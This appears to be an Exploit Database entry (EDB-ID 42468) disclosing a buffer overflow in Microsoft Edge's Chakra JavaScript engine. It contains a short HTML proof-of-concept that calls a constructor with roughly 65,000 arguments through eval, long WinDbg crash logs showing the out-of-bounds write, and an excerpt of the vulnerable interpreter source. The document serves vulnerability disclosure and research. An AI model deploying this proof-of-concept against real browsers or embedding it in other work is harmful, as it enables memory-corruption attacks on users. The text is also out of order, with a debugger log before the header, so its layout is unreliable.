ModLoad: 00007ffe`940f0000 00007ffe`94178000 C:\Windows\system32\directmanipulation.dll ModLoad: 00007ffe`98170000 00007ffe`98184000 
C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll ModLoad: 00007ffe`81bb0000 00007ffe`81be8000 C:\Windows\System32\smartscreenps.dll ModLoad: 00007ffe`94210000 00007ffe`94398000 C:\Windows\SYSTEM32\windows.globalization.dll ModLoad: 00007ffe`8b520000 00007ffe`8b6e5000 C:\Windows\System32\uiautomationcore.dll (1590.5d8): Break instruction exception - code 80000003 (first chance) ntdll!DbgBreakPoint: 00007ffe`a1f48d70 cc int 3 0:035> g onecoreuap\inetcore\urlmon\zones\zoneidentifier.cxx(359)\urlmon.dll!00007FFE958108C0: (caller: 00007FFE9580F77D) ReturnHr(2) tid(b70) 80070002 œµÕ≥’“≤ªµΩ÷∏∂®µƒŒƒº˛°£ (1590.b70): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d: 00007ffe`8133ba8d 488904d1 mov qword ptr [rcx+rdx*8],rax ds:000000d8`b8400000=???????????????? 0:016> r rax=0001000042424242 rbx=000002aa98205cbb rcx=000000d8b83f9e98 rdx=0000000000000c2d rsi=0000000000000000 rdi=000002aa98200025 rip=00007ffe8133ba8d rsp=000000d8b83f9bd0 rbp=000000d8b83f9c00 r8=000000d8b83f9d20 r9=000002aa8688fe00 r10=000002aa86879760 r11=000000d8b83f9978 r12=0000000000000000 r13=000002aa8312a270 r14=0000000000000000 r15=000002aa98205cc2 iopl=0 nv up ei pl nz ac pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010212 chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d: 00007ffe`8133ba8d 488904d1 mov qword ptr [rcx+rdx*8],rax ds:000000d8`b8400000=???????????????? 
0:016> dq ecx
000000d8`b83f9e98  00000000`00000030 000002aa`86879760
000000d8`b83f9ea8  00010000`42424242 00010000`42424242
000000d8`b83f9eb8  00010000`42424242 00010000`42424242
000000d8`b83f9ec8  00010000`42424242 00010000`42424242
000000d8`b83f9ed8  00010000`42424242 00010000`42424242
000000d8`b83f9ee8  00010000`42424242 00010000`42424242
000000d8`b83f9ef8  00010000`42424242 00010000`42424242
000000d8`b83f9f08  00010000`42424242 00010000`42424242
0:016> dq [ecx+edx*8]
000000d8`b8400000  ????????`???????? ????????`????????
000000d8`b8400010  ????????`???????? ????????`????????
000000d8`b8400020  ????????`???????? ????????`????????
000000d8`b8400030  ????????`???????? ????????`????????
000000d8`b8400040  ????????`???????? ????????`????????
000000d8`b8400050  ????????`???????? ????????`????????
000000d8`b8400060  ????????`???????? ????????`????????
000000d8`b8400070  ????????`???????? ????????`????????
0:016> !address 000000d8`b8400000
Usage:
Allocation Base:        000000d8`b8400000
Base Address:           000000d8`b8400000
End Address:            000000d8`b84fc000
Region Size:            00000000`000fc000
Type:                   00020000        MEM_PRIVATE
State:                  00002000        MEM_RESERVE
Protect:                00000000
More info:              ~17k
0:016> !address ecx
Usage:                  Stack
Allocation Base:        000000d8`b7a00000
Base Address:           000000d8`b83f4000
End Address:            000000d8`b8400000
Region Size:            00000000`0000c000
Type:                   00020000        MEM_PRIVATE
State:                  00001000        MEM_COMMIT
Protect:                00000004        PAGE_READWRITE
More info:              ~16k
0:016> kb
RetAddr           : Args to Child                                                           : Call Site
00007ffe`8120a2a5 : 000000d8`b83f9d20 000002aa`98205cbb 000000d8`b83f9c60 000002aa`98205cbb : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d
00007ffe`810fa321 : 000000d8`b83f9d20 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x10fec5
00007ffe`8102aeac : 000000d8`b83f9d20 000002aa`96ad0000 000000d8`b83f9ea0 000002aa`8312dc00 : chakra!Js::InterpreterStackFrame::Process+0x1b1
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
[...]
0:016> g
STATUS_STACK_BUFFER_OVERRUN encountered
(1590.b70): Break instruction exception - code 80000003 (first chance)
KERNELBASE!UnhandledExceptionFilter+0x85960:
00007ffe`9e61c120 cc              int     3
0:016> kb
RetAddr           : Args to Child                                                           : Call Site
00007ffe`811c726a : 00007ffe`814f2820 00007ffe`814f2820 000000d8`b83f9e70 000000d8`b83f9e70 : KERNELBASE!UnhandledExceptionFilter+0x85960
00007ffe`811c73f9 : 00007ffe`00000000 00007ffe`80f50000 00007ffe`8160e2f0 00007ffe`816c6ea4 : chakra!_raise_securityfailure+0x1a
00007ffe`811cac98 : 000100d8`fa7ddce2 00007ffe`a1eb92e2 00007ffe`8102aeac 000000d8`00000000 : chakra!_report_gsfailure+0x169
00007ffe`a1f4a08d : 00000000`00000000 000000d8`b83f8eb0 00000000`00000000 00000000`00000000 : chakra!_GSHandlerCheck_EH+0x38
00007ffe`a1eb9c58 : 00000000`00000000 00000000`00000000 000002aa`8312dc00 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xd
00007ffe`a1f4910e : 000002aa`8315fbc0 00007ffe`a1ec9f66 000002aa`98205cbb 000000d8`b83f9538 : ntdll!RtlDispatchException+0x368
00007ffe`8133ba8d : 000002aa`8312a270 000002aa`9820003d 000002aa`8312a270 00000000`00000000 : ntdll!KiUserExceptionDispatcher+0x2e
00007ffe`8120a2a5 : 000000d8`b83f9d20 000002aa`98205cbb 000000d8`b83f9c60 000002aa`98205cbb : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d
00007ffe`810fa321 : 000000d8`b83f9d20 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x10fec5
00007ffe`8102aeac : 000000d8`b83f9d20 000002aa`96ad0000 000000d8`b83f9ea0 000002aa`8312dc00 : chakra!Js::InterpreterStackFrame::Process+0x1b1
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
[...]
-->
<html>
<head>
<title> POC </title>
</head>
<script>
var a = '0x42424242,'.repeat(0xFFFF-2);
var b = "function Car(){} var car = new Car(a,"+a+"a);";
eval(b);
</script>
</html>
Exploit Database EDB-ID: 42468

Publication date: 2017-08-16 22:00 +00:00
Author: Huang Anwen
EDB verified: No

<!--
Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team

This is the HEAP BASED OVERFLOW version of the issue.

// ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp
Var InterpreterStackFrame::InterpreterHelper(ScriptFunction* function, ArgumentReader args, void* returnAddress, void* addressOfReturnAddress, const bool isAsmJs)
{
    [...]
    if (!isAsmJs && executeFunction->IsCoroutine())
    {
        [...]
    }
    else
    {
        InterpreterStackFrame::Setup setup(function, args);
        size_t varAllocCount = setup.GetAllocationVarCount();
        //printf("varAllocCount: %d(%X)\r\n", varAllocCount, varAllocCount);
        size_t varSizeInBytes = varAllocCount * sizeof(Var);

        //
        // Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack.
        //
        DWORD_PTR stackAddr;

        // If the locals area exceeds a certain limit, allocate it from a private arena rather than
        // this frame. The current limit is based on an old assert on the number of locals we would allow here.
        if (varAllocCount > InterpreterStackFrame::LocalsThreshold) //we can make this condition satisfied so the buffer will be allocated on the heap instead of the stack!!!
        {
            ArenaAllocator *tmpAlloc = nullptr;
            fReleaseAlloc = functionScriptContext->EnsureInterpreterArena(&tmpAlloc);
            allocation = (Var*)tmpAlloc->Alloc(varSizeInBytes);
            stackAddr = reinterpret_cast<DWORD_PTR>(&allocation); // use a stack address so the debugger stepping logic works (step-out, for example, compares stack depths to determine when to complete the step)
        }
        else
        {
            PROBE_STACK_PARTIAL_INITIALIZED_INTERPRETER_FRAME(functionScriptContext, Js::Constants::MinStackInterpreter + varSizeInBytes);
            allocation = (Var*)_alloca(varSizeInBytes);
#if DBG
            memset(allocation, 0xFE, varSizeInBytes);
#endif
            stackAddr = reinterpret_cast<DWORD_PTR>(allocation);
        }
    [...]
    return aReturn;
}

Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00007ff7`49700000 00007ff7`49725000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
ModLoad: 00007ffa`13700000 00007ffa`138db000   C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 00007ffa`119f0000 00007ffa`11a9e000   C:\Windows\System32\KERNEL32.DLL
ModLoad: 00007ffa`0fd90000 00007ffa`0ffd9000   C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffa`0e140000 00007ffa`0e1be000   C:\Windows\SYSTEM32\apphelp.dll
ModLoad: 00007ffa`11b80000 00007ffa`11e79000   C:\Windows\System32\combase.dll
ModLoad: 00007ffa`103f0000 00007ffa`104e6000   C:\Windows\System32\ucrtbase.dll
ModLoad: 00007ffa`11160000 00007ffa`11285000   C:\Windows\System32\RPCRT4.dll
ModLoad: 00007ffa`104f0000 00007ffa`1055a000   C:\Windows\System32\bcryptPrimitives.dll
ModLoad: 00007ffa`11630000 00007ffa`116cd000   C:\Windows\System32\msvcrt.dll
ModLoad: 00007ffa`0a400000 00007ffa`0a460000   C:\Windows\SYSTEM32\wincorlib.DLL
ModLoad: 00007ffa`10c90000 00007ffa`10d50000   C:\Windows\System32\OLEAUT32.dll
ModLoad: 00007ffa`0fcd0000 00007ffa`0fd6a000   C:\Windows\System32\msvcp_win.dll
ModLoad: 00007ffa`0fc00000 00007ffa`0fc11000   C:\Windows\System32\kernel.appcore.dll
ModLoad: 00007ff9`f3680000 00007ff9`f3a44000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll
ModLoad: 00007ffa`10560000 00007ffa`10c52000   C:\Windows\System32\Windows.Storage.dll
ModLoad: 00007ffa`11940000 00007ffa`119e1000   C:\Windows\System32\advapi32.dll
ModLoad: 00007ffa`11b20000 00007ffa`11b79000   C:\Windows\System32\sechost.dll
ModLoad: 00007ffa`113e0000 00007ffa`11431000   C:\Windows\System32\shlwapi.dll
ModLoad: 00007ffa`10c60000 00007ffa`10c87000   C:\Windows\System32\GDI32.dll
ModLoad: 00007ffa`10200000 00007ffa`10388000   C:\Windows\System32\gdi32full.dll
ModLoad: 00007ffa`10d60000 00007ffa`10eaa000   C:\Windows\System32\USER32.dll
ModLoad: 00007ffa`0fd70000 00007ffa`0fd8e000   C:\Windows\System32\win32u.dll
ModLoad: 00007ffa`11790000 00007ffa`1183a000   C:\Windows\System32\shcore.dll
ModLoad: 00007ffa`0fb70000 00007ffa`0fbbc000   C:\Windows\System32\powrprof.dll
ModLoad: 00007ffa`0fbc0000 00007ffa`0fbd5000   C:\Windows\System32\profapi.dll
ModLoad: 00007ffa`08380000 00007ffa`08606000   C:\Windows\SYSTEM32\iertutil.dll
ModLoad: 00007ffa`0ee70000 00007ffa`0eea1000   C:\Windows\SYSTEM32\ntmarta.dll
ModLoad: 00007ffa`0fa70000 00007ffa`0fa99000   C:\Windows\SYSTEM32\USERENV.dll
ModLoad: 00007ff9`ff7d0000 00007ff9`ff7f6000   C:\Windows\SYSTEM32\clipc.dll
ModLoad: 00007ffa`0f200000 00007ffa`0f2a4000   C:\Windows\SYSTEM32\DNSAPI.dll
ModLoad: 00007ffa`0f5c0000 00007ffa`0f5d7000   C:\Windows\SYSTEM32\cryptsp.dll
ModLoad: 00007ffa`115b0000 00007ffa`1161c000   C:\Windows\System32\WS2_32.dll
ModLoad: 00007ffa`10d50000 00007ffa`10d58000   C:\Windows\System32\NSI.dll
ModLoad: 00007ffa`11730000 00007ffa`1175d000   C:\Windows\System32\IMM32.DLL
ModLoad: 00007ffa`0f1c0000 00007ffa`0f1f7000   C:\Windows\SYSTEM32\IPHLPAPI.DLL
ModLoad: 00007ffa`0e540000 00007ffa`0e6b0000   C:\Windows\SYSTEM32\twinapi.appcore.dll
ModLoad: 00007ffa`0fa40000 00007ffa`0fa65000   C:\Windows\SYSTEM32\bcrypt.dll
ModLoad: 00007ffa`0eca0000 00007ffa`0ecc1000   C:\Windows\SYSTEM32\profext.dll
ModLoad: 00007ff9`ff580000 00007ff9`ff5f4000   C:\Windows\SYSTEM32\msiso.dll
ModLoad: 00007ffa`054d0000 00007ffa`054f2000   C:\Windows\SYSTEM32\EShims.dll
ModLoad: 00007ffa`045d0000 00007ffa`045eb000   C:\Windows\SYSTEM32\MPR.dll
ModLoad: 00007ffa`11290000 00007ffa`113d5000   C:\Windows\System32\ole32.dll
ModLoad: 00007ffa`0e370000 00007ffa`0e405000   C:\Windows\system32\uxtheme.dll
ModLoad: 00007ff9`f1650000 00007ff9`f2d01000   C:\Windows\SYSTEM32\edgehtml.dll
ModLoad: 00007ffa`0c190000 00007ffa`0c2c9000   C:\Windows\SYSTEM32\wintypes.dll
ModLoad: 00007ff9`f0e60000 00007ff9`f164b000   C:\Windows\SYSTEM32\chakra.dll
ModLoad: 00007ffa`04630000 00007ffa`0466f000   C:\Windows\SYSTEM32\MLANG.dll
ModLoad: 00007ffa`0c840000 00007ffa`0c8b6000   C:\Windows\SYSTEM32\policymanager.dll
ModLoad: 00007ffa`0c6f0000 00007ffa`0c77f000   C:\Windows\SYSTEM32\msvcp110_win.dll
ModLoad: 00007ffa`0cb10000 00007ffa`0cca6000   C:\Windows\SYSTEM32\PROPSYS.dll
ModLoad: 00007ffa`04d30000 00007ffa`04dfb000   C:\Windows\System32\ieproxy.dll
ModLoad: 00007ffa`09f90000 00007ffa`0a096000   C:\Windows\System32\Windows.UI.dll
ModLoad: 00007ffa`0a230000 00007ffa`0a2b2000   C:\Windows\SYSTEM32\TextInputFramework.dll
ModLoad: 00007ffa`0b640000 00007ffa`0b912000   C:\Windows\SYSTEM32\CoreUIComponents.dll
ModLoad: 00007ffa`0da10000 00007ffa`0daf3000   C:\Windows\SYSTEM32\CoreMessaging.dll
ModLoad: 00007ffa`0c6d0000 00007ffa`0c6e5000   C:\Windows\SYSTEM32\usermgrcli.dll
ModLoad: 00007ffa`0abe0000 00007ffa`0b111000   C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
ModLoad: 00007ffa`11e80000 00007ffa`132b7000   C:\Windows\System32\shell32.dll
ModLoad: 00007ffa`101b0000 00007ffa`101f9000   C:\Windows\System32\cfgmgr32.dll
ModLoad: 00007ffa`0ccb0000 00007ffa`0ccda000   C:\Windows\SYSTEM32\dwmapi.dll
ModLoad: 00007ff9`ff8e0000 00007ff9`ffc0e000   C:\Windows\SYSTEM32\WININET.dll
ModLoad: 00007ffa`0faa0000 00007ffa`0fad0000   C:\Windows\SYSTEM32\SspiCli.dll
ModLoad: 00007ffa`11440000 00007ffa`115a6000   C:\Windows\System32\msctf.dll
ModLoad: 00007ffa`0a0a0000 00007ffa`0a1a2000   C:\Windows\SYSTEM32\mrmcorer.dll
ModLoad: 00007ff9`fddf0000 00007ff9`fde00000   C:\Windows\SYSTEM32\tokenbinding.dll
ModLoad: 00007ffa`00260000 00007ffa`0027b000   C:\Windows\SYSTEM32\ondemandconnroutehelper.dll
ModLoad: 00007ffa`0a370000 00007ffa`0a3d9000   C:\Windows\SYSTEM32\Bcp47Langs.dll
ModLoad: 00007ffa`07430000 00007ffa`07507000   C:\Windows\SYSTEM32\winhttp.dll
ModLoad: 00007ffa`0f420000 00007ffa`0f47c000   C:\Windows\system32\mswsock.dll
ModLoad: 00007ffa`0a730000 00007ffa`0a73b000   C:\Windows\SYSTEM32\WINNSI.DLL
ModLoad: 00007ffa`07260000 00007ffa`07428000   C:\Windows\SYSTEM32\urlmon.dll
ModLoad: 00007ffa`0f5e0000 00007ffa`0f5eb000   C:\Windows\SYSTEM32\CRYPTBASE.DLL
ModLoad: 00007ff9`fe760000 00007ff9`fe77a000   C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll
ModLoad: 00007ff9`f3a50000 00007ff9`f3bda000   C:\Windows\SYSTEM32\ieapfltr.dll
ModLoad: 00007ffa`0e1d0000 00007ffa`0e1ed000   C:\Windows\System32\rmclient.dll
ModLoad: 00007ff9`fd750000 00007ff9`fd768000   C:\Windows\System32\UiaManager.dll
ModLoad: 00007ff9`fb720000 00007ff9`fb767000   C:\Windows\system32\dataexchange.dll
ModLoad: 00007ffa`0d180000 00007ffa`0d45f000   C:\Windows\SYSTEM32\d3d11.dll
ModLoad: 00007ffa`0db30000 00007ffa`0dc52000   C:\Windows\SYSTEM32\dcomp.dll
ModLoad: 00007ffa`0e9e0000 00007ffa`0ea84000   C:\Windows\SYSTEM32\dxgi.dll
ModLoad: 00007ff9`fc470000 00007ff9`fc4f2000   C:\Windows\system32\twinapi.dll
ModLoad: 00007ffa`060c0000 00007ffa`060e8000   C:\Windows\SYSTEM32\srpapi.dll
ModLoad: 00007ffa`0ffe0000 00007ffa`101a9000   C:\Windows\System32\CRYPT32.dll
ModLoad: 00007ffa`0fbe0000 00007ffa`0fbf1000   C:\Windows\System32\MSASN1.dll
ModLoad: 00007ff9`f8480000 00007ff9`f84fa000   C:\Windows\SYSTEM32\windows.ui.core.textinput.dll
ModLoad: 00007ff9`ff120000 00007ff9`ff17d000   C:\Windows\SYSTEM32\ninput.dll
ModLoad: 00007ffa`0d460000 00007ffa`0da04000   C:\Windows\SYSTEM32\d2d1.dll
ModLoad: 00007ffa`06cf0000 00007ffa`06faf000   C:\Windows\SYSTEM32\DWrite.dll
ModLoad: 00007ff9`f8060000 00007ff9`f80ba000   C:\Windows\System32\Windows.Graphics.dll
ModLoad: 00007ffa`06950000 00007ffa`0695f000   C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll
ModLoad: 00007ffa`0b1c0000 00007ffa`0b202000   C:\Windows\SYSTEM32\vm3dum64.dll
ModLoad: 00007ffa`0b150000 00007ffa`0b1b7000   C:\Windows\SYSTEM32\D3D10Level9.dll
ModLoad: 00007ff9`fbc20000 00007ff9`fbc8b000   C:\Windows\System32\oleacc.dll
ModLoad: 00007ffa`06480000 00007ffa`06490000   C:\Windows\system32\msimtf.dll
ModLoad: 00007ffa`06ab0000 00007ffa`06b38000   C:\Windows\system32\directmanipulation.dll
ModLoad: 00007ff9`fe370000 00007ff9`fe411000   C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
ModLoad: 00007ffa`06760000 00007ffa`06774000   C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll
ModLoad: 00007ffa`05a10000 00007ffa`05a48000   C:\Windows\System32\smartscreenps.dll
ModLoad: 00007ffa`06b40000 00007ffa`06cc8000   C:\Windows\SYSTEM32\windows.globalization.dll
(11fc.108c): Access violation - code c0000005 (!!! second chance !!!)
chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:
00007ff9`f124bcad 488904d1        mov     qword ptr [rcx+rdx*8],rax ds:0000015e`3d550000=????????????????
0:016> r
rax=0001000042424242 rbx=000000388f1fb8b0 rcx=0000015e3d5401b0
rdx=0000000000001fca rsi=0000000000000002 rdi=000000388f1fb3c0
rip=00007ff9f124bcad rsp=000000388f1fbae0 rbp=000000388f1fbb10
 r8=0000015e3d500030  r9=0000015e2c538000 r10=000000388f1fb918
r11=0000015e2c53c000 r12=0000000000000000 r13=0000015e2932a120
r14=0000000000000000 r15=0000015e4063f9b3
iopl=0         nv up ei pl nz ac pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010210
chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:
00007ff9`f124bcad 488904d1        mov     qword ptr [rcx+rdx*8],rax ds:0000015e`3d550000=????????????????
0:016> dq ecx
0000015e`3d5401b0  00000000`00000000 00010000`42424242
0000015e`3d5401c0  00010000`42424242 00010000`42424242
0000015e`3d5401d0  00010000`42424242 00010000`42424242
0000015e`3d5401e0  00010000`42424242 00010000`42424242
0000015e`3d5401f0  00010000`42424242 00010000`42424242
0000015e`3d540200  00010000`42424242 00010000`42424242
0000015e`3d540210  00010000`42424242 00010000`42424242
0000015e`3d540220  00010000`42424242 00010000`42424242
0:016> dq [ecx+edx*8]
0000015e`3d550000  ????????`???????? ????????`????????
0000015e`3d550010  ????????`???????? ????????`????????
0000015e`3d550020  ????????`???????? ????????`????????
0000015e`3d550030  ????????`???????? ????????`????????
0000015e`3d550040  ????????`???????? ????????`????????
0000015e`3d550050  ????????`???????? ????????`????????
0000015e`3d550060  ????????`???????? ????????`????????
0000015e`3d550070  ????????`???????? ????????`????????
0:016> !address ecx
Failed to map Heaps (error 8007001e)
Usage:                  <unclassified>
Allocation Base:        0000015e`3d500000
Base Address:           0000015e`3d500000
End Address:            0000015e`3d550000
Region Size:            00000000`00050000
Type:                   00020000    MEM_PRIVATE
State:                  00001000    MEM_COMMIT
Protect:                00000004    PAGE_READWRITE
0:016> !address 0000015e`3d550000
Usage:                  Free
Base Address:           0000015e`3d550000
End Address:            0000015e`3d7f0000
Region Size:            00000000`002a0000
Type:                   00000000
State:                  00010000    MEM_FREE
Protect:                00000001    PAGE_NOACCESS
0:016> kb
RetAddr : Args to Child : Call Site
00007ff9`f10fe96d : 0000015e`3d500030 0000015e`4063f9ac 00000038`8f1fbb70 0000015e`4063f9ac : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d
00007ff9`f0f5ffb1 : 0000015e`3d500030 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x19e8fd
00007ff9`f0ff80cc : 0000015e`3d500030 0000015e`3c7a01a0 00000038`8f1fbc30 00007ff9`f0ebc500 : chakra!Js::InterpreterStackFrame::Process+0x1b1
00007ff9`f0ff7be1 : 0000015e`2c560600 00000038`8f1fbe10 0000015e`3c7e0fba 00000038`8f1fbe28 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
0000015e`3c7e0fba : 00000038`8f1fbe60 0000015e`2c560600 ffffffff`fffffffe 00007ff9`f10d6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
00007ff9`f0e783df : 0000015e`2c560600 00000000`04000001 0000015e`2c550020 00000038`8f1fbef0 : 0x15e`3c7e0fba
00007ff9`f0e7816a : 0000015e`3c7a01a0 0000015e`2c560600 00007ff9`f15a9f80 00000038`8f1fbef0 : chakra!Js::GlobalObject::ExecuteEvalParsedFunction+0x77
00007ff9`f0e77fb8 : 0000015e`2c540000 00007ff9`f15a9f80 0000015e`00000000 0000015e`2c53c000 : chakra!Js::GlobalObject::VEval+0x19a
00007ff9`f0e77ecd : 00000038`8f1fc040 0000015e`2c53b5c0 0000015e`2932a120 00000038`8f1fc000 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8
00007ff9`f10d6be3 : 0000015e`2c53b5c0 00000000`18000003 0000015e`2c550020 0000015e`2c54d770 : chakra!Js::GlobalObject::EntryEval+0x7d
00007ff9`f0fc6bf3 : 0000015e`2932a120 00000000`00000018 00000038`8f1fc0e8 0000015e`2c53c000 : chakra!amd64_CallFunction+0x93
00007ff9`f0e871ac : 0000015e`2c53b5c0 00007ff9`f0e77e50 00000038`8f1fc110 00000038`8f1fc2a0 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ff9`f0e877b4 : 00000038`8f1fc2a0 0000015e`3c7c0116 0000015e`2c53b5c0 00007ff9`00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114
00007ff9`f0f64920 : 00000038`8f1fc2a0 0000015e`3c7c0116 0000015e`8f1fc2a0 0000015e`3c7c0124 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c
00007ff9`f0f5ff2c : 00000038`8f1fc2a0 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250
00007ff9`f0ff80cc : 00000038`8f1fc2a0 0000015e`3c7a0000 00000038`8f1fc4a0 00000000`00000001 : chakra!Js::InterpreterStackFrame::Process+0x12c
00007ff9`f0ff7be1 : 0000015e`2c560480 00000038`8f1fc680 0000015e`3c7e0fc2 00000038`8f1fc698 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
0000015e`3c7e0fc2 : 00000038`8f1fc6d0 00000000`00000000 00000000`00000000 00007ff9`f10d6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
00007ff9`f10d6be3 : 0000015e`2c560480 00000000`00000000 00000000`00000000 00000000`00000000 : 0x15e`3c7e0fc2
00007ff9`f0fc6bf3 : 0000015e`2932a120 00000000`00000000 0000015e`29352a10 00007ff9`f0fda837 : chakra!amd64_CallFunction+0x93
00007ff9`f0ff1810 : 0000015e`2c560480 00007ff9`f10d6df0 00000038`8f1fc7d0 0000015e`2932d110 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ff9`f0ff0a37 : 0000015e`2c560480 00000038`8f1fc8c0 0000015e`2932d110 00007ffa`11697100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100
00007ff9`f10b907e : 0000015e`2c560480 00000038`8f1fc920 0000015e`2932d110 0000015e`2932da00 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b
00007ff9`f101cd54 : 0000015e`2c560480 00000038`8f1fc960 00000000`00000000 00000038`8f1fc978 : chakra!ScriptSite::CallRootFunction+0x6a
00007ff9`f0fb1b49 : 0000015e`2932d000 0000015e`2c560480 00000038`8f1fca10 00000000`00000000 : chakra!ScriptSite::Execute+0x124
00007ff9`f0fb2e8e : 0000015e`29329cd0 00000038`8f1fcf18 00000038`8f1fcf50 00000038`80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5
00007ff9`f0fb3121 : 0000015e`29329cd0 0000015e`29ce82e4 00000000`00000000 00000156`270b4330 : chakra!ScriptEngine::ParseScriptTextCore+0x436
00007ff9`f1a53c75 : 0000015e`29329d20 0000015e`29ce82e4 00000156`000000f1 00000000`00000000 : chakra!ScriptEngine::ParseScriptText+0xb1
00007ff9`f1a53abe : 00000000`00000000 00000038`8f1fcde9 00000156`270b4260 00000156`00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119
00007ff9`f1a535d7 : 00000000`00000000 00000156`270b4260 00000156`2703c1c0 00000156`270b41b0 : edgehtml!CScriptCollection::ParseScriptText+0x202
00007ff9`f1a52f07 : 00000156`27050c01 00000156`270ac100 00000156`00000082 00007ff9`00000000 : edgehtml!CScriptData::CommitCode+0x357
00007ff9`f1b12f8d : 00000000`ffffffff 00000156`2703c460 00000000`ffffffff 00000000`00000000 : edgehtml!CScriptData::Execute+0x20f
00007ff9`f19543d4 : 00000000`00000000 00000156`2708c440 00000000`00000001 00007ff9`f1b0ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d
00007ff9`f19534a1 : 00000156`27050c00 00000000`00000000 00000156`27050c00 00000156`2702c8c0 : edgehtml!CHtmParseBase::Execute+0x204
00007ff9`f1b0d23b : 00000000`00026e8b 00000156`27020000 00000156`270800b0 00000156`2702c8c0 : edgehtml!CHtmPost::Exec+0x1e1
00007ff9`f1b0d11f : 00000156`2702c8c0 00000000`00026e8b 0000015e`29ce82e0 00000000`00000000 : edgehtml!CHtmPost::Run+0x2f
00007ff9`f1b0cfd3 : 00000156`27020000 00000000`09806f01 00000000`00000002 00000156`27061680 : edgehtml!PostManExecute+0x63
00007ff9`f1b0ce6d : 00000156`2702c8c0 00000000`09806ff9 0000015e`00000000 00007ffa`083a4779 : edgehtml!PostManResume+0xa3
00007ff9`f1b1b353 : 00000156`27048600 0000015e`29c26b50 00000000`00000000 00000000`00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d
00007ff9`f1af50db : 00000156`270282d0 0000015e`29325463 0000015e`29302200 00000038`8f1fd4a0 : edgehtml!CDwnChan::OnMethodCall+0x23
00007ff9`f1981706 : 0000015e`29302728 00000156`27061680 0000015e`29302260 00000038`8f1fd4d0 : edgehtml!GWndAsyncTask::Run+0x1b
00007ff9`f1aca860 : 00000000`16389c44 00000156`270616e0 00000156`270800b0 00007ff9`f1a29138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236
00007ff9`f1aca683 : 0000015e`29c26b50 00000000`00000000 00000000`00000002 00000156`27028170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70
00007ff9`f19822b3 : 00000038`8f1fd980 00000000`00008002 00000156`27028170 00007ffa`10d847df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3
00007ff9`f19807a5 : 00000000`00008002 00000156`27020000 00000156`00000000 00000000`00000002 : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53
00007ffa`10d6bc50 : 00000000`00e80380 00000000`00000001 00000000`00000002 00000000`80000012 : edgehtml!GlobalWndProc+0x125
